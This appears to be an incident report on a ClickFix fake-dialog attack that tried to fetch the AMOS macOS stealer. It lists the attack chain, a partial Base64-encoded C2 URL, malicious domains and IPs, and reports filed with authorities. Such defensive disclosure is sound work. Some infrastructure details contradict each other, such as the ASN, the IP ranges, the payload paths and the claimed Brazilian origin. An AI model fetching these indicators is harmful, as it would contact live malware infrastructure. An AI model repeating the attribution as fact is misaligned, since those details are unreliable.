A comprehensive investigation into a social engineering attack discovered on kimi.com (Moonshot AI), where a ClickFix campaign attempted to deliver the AMOS (Atomic macOS Stealer) malware through fake system dialog overlays. This report documents the attack chain, infrastructure analysis, and multinational threat actor connections.
On February 24, 2026, during routine use of kimi.com — an AI assistant platform operated by Moonshot AI (China) — a social engineering attack was encountered and the malicious command was executed. The attack used the "ClickFix" technique: a fake macOS system dialog overlay that instructed the user to copy and execute a terminal command.
The command was executed in macOS Terminal and attempted to download the AMOS (Atomic macOS Stealer) malware from a command-and-control server proxied through Cloudflare CDN. The connection failed at the TLS/SSL handshake stage (curl: (35) Send failure: Broken pipe) — 0 bytes of payload were transferred, and no malicious code was executed. DNS resolution did occur, meaning the system briefly contacted the C2 infrastructure. A comprehensive security assessment confirmed no indicators of compromise on the system.
Key Finding: This investigation revealed a multinational cybercrime operation spanning three countries — a Chinese AI platform (delivery vector), Brazilian hosting infrastructure (command & control), and Russian-origin malware (AMOS Stealer). The download attempt was unsuccessful based on available evidence, but the sophistication of the attack chain warranted full documentation and federal reporting.
The attack followed a well-documented ClickFix social engineering pattern, adapted specifically for macOS users visiting AI platforms.
The command injected via the ClickFix overlay followed a standard two-stage pattern — a Base64-encoded URL decoded at runtime to obscure the true destination:
ClickFix is a social engineering technique that has gained significant traction since 2024. It presents users with fake browser or system error messages that instruct them to "fix" an issue by copying a command and pasting it into their terminal. The technique exploits user trust in system dialogs and the natural desire to resolve apparent errors.
In this instance, the fake dialog was designed to mimic a macOS system prompt, appearing while the user was interacting with kimi.com's AI assistant interface. The overlay was visually convincing and presented an urgent-seeming system notification.
AMOS is a Russian-origin information-stealing malware specifically designed for macOS systems. First observed in early 2023, it is sold as Malware-as-a-Service (MaaS) on Russian-language Telegram channels. Its capabilities include stealing browser credentials and cookies, cryptocurrency wallet data, Keychain passwords, and system information.
The command used Base64 encoding to hide the true download URL from casual inspection. This is a common evasion technique that prevents URL-based detection by security tools scanning clipboard content or terminal input.
The C2 server was hosted at contatoplus.com, resolving to IP addresses in the 191.101.236.x range. This infrastructure is operated by Contabo GmbH (ASN 174), a German-based hosting provider known for affordable VPS services frequently exploited by threat actors due to minimal verification requirements.
Infrastructure Note: Contabo (ASN 174) has been flagged in multiple threat intelligence reports as a hosting provider commonly used for malicious infrastructure due to lenient customer verification. The Brazilian IP allocation suggests the VPS was provisioned through Contabo's South American presence.
The payload URL path /new/data/bpa/new/data.txt follows patterns commonly seen in AMOS campaigns — generic directory names designed to look innocuous in server logs. The .txt extension masks what would likely be a shell script or binary payload.
This attack chain spans three countries, indicating either a coordinated multinational operation or a supply-chain compromise where multiple independent actors each contributed a component:
This multinational structure complicates law enforcement response, as jurisdiction spans multiple legal systems. The use of a legitimate AI platform as a delivery mechanism represents an evolution of the ClickFix technique from targeting generic web services to exploiting emerging AI platforms where users may be less security-conscious.
| Type | Indicator | Context |
|---|---|---|
| Domain | contatoplus.com | C2 server hosting AMOS payload |
| IP | 172.67.156.82 | Cloudflare CDN IP resolving for contatoplus.com |
| IP | 104.21.32.228 | Cloudflare CDN IP resolving for contatoplus.com |
| URL | contatoplus.com/curl/82c4a791ffa923f2617 73431b93efe388f18bd3a386618 3a092eadc88146d77a | Payload download endpoint (hex = campaign/victim ID) |
| Base64 | aHR0cHM6Ly9jb250YXRvcGx1cy5jb20v Y3VybC84MmM0YTc5MWZmYTkyM2Yy... | Encoded C2 URL delivered via clipboard hijack |
| Domain | kimi.com | Delivery platform (ClickFix overlay source) |
| CDN | Cloudflare (ASN 13335) | C2 domain proxied through Cloudflare CDN |
| Error | curl: (35) Send failure: Broken pipe | TLS handshake failed — payload not delivered |
| Malware | AMOS / Atomic macOS Stealer | Intended payload (Russian-origin MaaS) |
| Technique | ClickFix / Fake Dialog | Social engineering overlay on AI platform |
The malicious curl command was executed in Terminal. The command attempted to connect to contatoplus.com but failed with a TLS handshake error (curl: (35) Send failure: Broken pipe). While 0 bytes of payload were transferred, DNS resolution did occur, meaning the system briefly contacted the C2 domain's infrastructure. A comprehensive security assessment was then conducted. Note: This was a security scan/assessment, not a formal forensic investigation by a certified examiner.
⚠ Command Execution Evidence: The Base64-decoded curl command was executed in macOS Terminal. The TLS/SSL connection failed before any data transfer (broken pipe at handshake). DNS resolution occurred — the machine contacted Cloudflare's CDN IPs (172.67.156.82 / 104.21.32.228) but no payload was downloaded or executed.
Assessment Conclusion: The curl command was executed in Terminal but the connection failed at the TLS handshake stage (error 35: broken pipe). Zero bytes of payload were transferred. DNS resolution to the C2 domain did occur (IPs 172.67.156.82, 104.21.32.228 — Cloudflare CDN), meaning the C2 operator may have logged the source IP. Extended security checks confirmed: System Integrity Protection enabled, Gatekeeper active, no AMOS .helper binary, no unauthorized LaunchAgents, no suspicious processes, no active C2 connections, SSH keys and Chrome credentials untouched (modification dates predate incident), no cryptocurrency wallets present. Passwords changed and 2FA reviewed as precautionary measures.
Filed formal internet crime complaint documenting the multinational malware distribution operation.
Consumer fraud report filed regarding deceptive malware distribution via a legitimate-appearing AI platform.
Cybersecurity incident report with full IOCs, MITRE ATT&CK mapping, and infrastructure analysis.
Submitted malware distribution report for both the delivery domain and C2 domain.
Reported contatoplus.com C2 domain for hosting malware distribution infrastructure behind Cloudflare CDN proxy. Requested service suspension.
Notified Anthropic about ClickFix campaigns targeting AI platform users, with recommendation for user education and platform hardening guidance.
Post-incident investigation of the contatoplus.com command-and-control domain revealed its role in a broader AMOS Stealer distribution network.
| Attribute | Value | Significance |
|---|---|---|
| Domain | contatoplus.com | C2 server — "contato" is Portuguese for "contact," suggesting Brazilian origin |
| CDN | Cloudflare (ASN 13335) | Proxied through Cloudflare to hide true origin IP and gain DDoS protection |
| IP (A Record) | 172.67.156.82 | Cloudflare anycast — true server IP hidden behind proxy |
| IP (A Record) | 104.21.32.228 | Cloudflare anycast — redundant CDN endpoint |
| Reverse DNS | None | No PTR record — common for malicious infrastructure |
| URL Path | /curl/82c4a791ff... | 64-char hex string = likely campaign or victim tracking identifier |
| Related Intel | Pulsedive flagged | Related Brazilian domains found in threat intelligence databases |
This C2 domain matches the documented AMOS Stealer ClickFix campaign pipeline reported by multiple security research teams in 2024–2025:
Why the Payload Failed: curl error 35 indicates a TLS/SSL handshake failure — the connection was reset (broken pipe) during the SSL negotiation phase. This could mean: (1) the C2 server was down or rate-limiting, (2) Cloudflare blocked the request, or (3) the server rejected the connection based on geographic or fingerprint filtering. Regardless, no data was transferred and no malicious code was executed on the system.